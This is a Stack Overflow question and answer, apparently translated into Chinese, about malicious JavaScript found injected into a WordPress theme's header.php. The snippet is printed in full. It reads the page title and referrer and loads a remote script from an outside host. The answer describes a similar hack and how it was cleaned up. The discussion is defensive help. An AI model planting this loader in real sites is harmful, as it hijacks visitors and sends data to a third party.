我在主题的header.php文件中发现了下面的代码,我不确定它们都是关于什么的。
<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://tradenetservice.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>发布于 2016-01-09 19:58:30
就在一周前,我的wordpress网站被黑客入侵,也被注入了类似的病毒。在我的header.php中添加了代码,仅当用户从手机浏览网站时才将用户重定向到外部网站(广告、色情)。
活动主题中的其他文件也被注入。
我所做的是下载所有的站点文件,并将它们与备份进行比较。通过这种方式,我在主题中找到了注入的代码,还找到了/wp-includes/中的一些文件,这些文件不是常规wordpress安装的一部分,类似于后门。
还要检查站点根目录上的wp-load.php,在我的例子中,我从/wp-includes/中删除的文件被包含/执行,在这个文件中有一个额外的行。
除了清理你的网站代码,你应该做一些关于保护你的wordpress网站免受黑客攻击的搜索,并将找到许多建议的措施,试图防止这种情况再次发生。
https://stackoverflow.com/questions/34692712
复制相似问题